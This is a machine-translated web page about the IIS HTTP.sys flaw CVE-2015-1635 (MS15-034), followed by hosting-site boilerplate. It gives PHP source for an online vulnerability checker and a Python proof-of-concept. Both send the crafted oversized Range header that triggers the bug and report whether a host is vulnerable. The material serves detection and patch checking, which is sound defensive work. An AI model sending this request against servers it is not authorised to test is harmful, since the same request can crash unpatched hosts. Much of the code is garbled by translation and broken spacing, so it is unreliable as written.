IIS latest high risk vulnerability (CVE-2015-1635, MS15-034) POC and Online Detection source code

Source: Internet
Author: User
Tags cloudflare cloudflare cdn

IIS latest high risk vulnerability (CVE-2015-1635, MS15-034) POC and Online Detection source code


HTTP. sys Remote Code Execution Vulnerability (CVE-2015-1635, MS15-034)
The remote code execution vulnerability exists in the HTTP protocol stack (HTTP. sys). This vulnerability occurs when HTTP. sys does not correctly analyze specially designed HTTP requests. Attackers who successfully exploit this vulnerability can execute arbitrary code in the context of the system account. Https://technet.microsoft.com/zh-cn/library/security/MS15-034
Online Detection source code

Php

Class VulnStatus {const FAIL = 0; const VULN = 1; const VULN_NOT_MS = 2; const PATCHED = 3; const NOT_VULN = 4; const NOT_VULN_MS = 5; const Limit = 6; public static function AsString ($ status, $ host) {switch ($ status) {case self: FAIL: return '; unable to connect ';. $ host. '; test the vulnerability. '; Case self: VULN: return';. $ host. '; the vulnerability exists. '; Case self: VULN_NOT_MS: return';. $ host. '; the vulnerability may exist, but it does not seem to use IIS. '; Case self: PATCHED: return';. $ host. '; fixed. '; Case self: NOT_VULN: return'; the patch status cannot be identified ';. $ host.';. IIS is not used and the vulnerability may not exist. '; Case self: NOT_VULN_MS: return'; the patch status cannot be identified ';. $ host.';. The vulnerability may not exist. '; Case self: NOT_VULN_CF: return';. $ host. '; CloudFlare CDN acceleration may be used, leading to vulnerability detection or non-existent. ';} Return'; seems to be broken '; ;}$ host = false; $ status = false; $ url = filter_input (INPUT_GET,'; host';, FILTER_SANITIZE_URL ); if (! Empty ($ url) & parse_url ($ url, PHP_URL_SCHEME) === null) {$ url = '; http ://';. $ url;} $ port = parse_url ($ url, PHP_URL_PORT); if ($ port = null) {$ port = 80 ;}$ url = parse_url ($ url, PHP_URL_HOST); if ($ url! = Null) {$ cachekey = '; ms15034 _';. $ url. ';_';. $ port; $ cachetime = 300; // 5 minutes $ host = htmlspecialchars ($ url, ENT_HTML5); if ($ port! = 80) {$ host. = ';:';. $ port;} $ memcached = new Memcached (); $ memcached-> addServer (';/var/run/memcached. sock ';, 0); $ status = $ memcached-> get ($ cachekey); if ($ status = false) {$ fp = @ fsockopen ($ url, $ port, $ errno, $ errstr, 5); if ($ fp = false) {$ status = VulnStatus: FAIL;} else {stream_set_timeout ($ fp, 5); $ header = "GET/HTTP/1.1 \ r \ n"; $ header. = "Host: stuff \ r \ n"; $ header. = "Rang E: bytes = 0-18446731673709551615 \ r \ n "; $ header. = "Connection: close \ r \ n"; fwrite ($ fp, $ header); $ response = fread ($ fp, 1024 ); fclose ($ fp); if (strpos ($ response, '; your request range does not match ';)! = False) {$ status = strpos ($ response, '; Microsoft';) = false? VulnStatus: VULN_NOT_MS: VulnStatus: VULN;} else if (strpos ($ response, '; Request an invalid header ';)! = False) {$ cachetime = 3600; // cache time $ status = VulnStatus: PATCHED;} else if (strpos ($ response, '; Microsoft ';) === false) {if (strpos ($ response, '; 403 Forbidden ';)! = False & strpos ($ response, '; cloudflare-nginx ';)! = False) {$ status = VulnStatus: NOT_VULN_CF;} else {$ status = VulnStatus: NOT_VULN ;}} else {$ status = VulnStatus: NOT_VULN_MS ;}} unset ($ fp, $ header, $ response); $ memcached-> set ($ cachekey, $ status, $ cachetime);} $ status = VulnStatus: AsString ($ status, $ host) ;}?> Charset = "UTF-8"> name = "theme-color" content = "#424242"> http-equiv = "X-UA-Compatible" content = "IE = edge, chrome = 1 "> name =" viewport "content =" width = device-width, initial-scale = 1.0 "> MS15-034 test href =" // maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css "rel =" stylesheet "> type =" text/css ">. container {max-width: 900px ;}. masthead {position: relative; padding: 20px 0; text-align: center; color: # fff; background-color: #424242; margin-bottom: 20px ;}. masthead a {color: # fff ;}. footer {text-align: center; padding: 15px; color: #555 ;}. footer span {color: # FA5994 ;}. form-inline {text-align: center; margin-bottom: 20px ;}. github {position: absolute; top: 0; right: 0 ;}


HTTP. sys Stack Vulnerability Test
Enter a URL or host name to test the server's href = "https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target = "_ blank"> MS15-034/href = "http://www.cve.mitre.org/cgi-bin/cvename.cgi? Name = CVE-2015-1635 "target =" _ blank "> CVE-2015-1635.

The HTTP protocol stack (HTTP. sys) causes remote code execution vulnerability when the HTTP protocol stack does not correctly analyze specially crafted HTTP requests. Attackers who successfully exploit this vulnerability can execute arbitrary code in the context of the system account.
To exploit this vulnerability, attackers must send a special HTTP request to the affected system. This update resolves this vulnerability by modifying the Windows HTTP protocol stack to process requests.
Id = "js-form" method = "GET"> php if ($ host! = False) {echo '; value = "';. $ host. ';"' ;;}?>> Type = "submit" class = "btn-primary btn-lg"> detect php if ($ status! ==False) {echo $ status ;}?>

Use Memcached distributed memory object cache system | all query results will be cached for five minutes
Vulnerability verification POC
Python version
#! /Usr/bin/env python _ author _ = '; jastra'; class bg_colors: VULN = '; 33 [92m'; NONVULN ='; 33 [95m '; EXPLOIT = '; 33 [91m'; try: import requests import retries t ImportError as ierr: print (bg_colors.EXPLOIT + "Error, looks like you don'; t have % s installed ", ierr) def identify_iis (domain): req = requests. get (str (domain) remote_server = req. headers ['; Server';] if "Microsoft-IIS" in remote_server: print (bg _ Colors. VULN + "[+] service is" + remote_server) ms15_034_test (str (domain) else: print (bg_colors.NONVULN + "[-] Not IIS \ n may be:" + remote_server) def ms15_034_test (domain): print ("START vuln check! ") Vuln_buffer =" GET/HTTP/1.1 \ r \ nHost: stuff \ r \ nRange: bytes = 0-18446731673709551615 \ r \ n "; req = requests. get (str (domain), params = vuln_buffer) if req. headers ['; content';] = "the request range does not match": print (bg_colors.EXPLOIT + "[+] vulnerability") else: print (bg_colors.EXPLOIT + "[-] IIS service cannot show whether the vulnerability exists. "+" manual detection required ") usr_domain = raw_input (" input domain name scan: ") identify_iis (usr_domain)

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.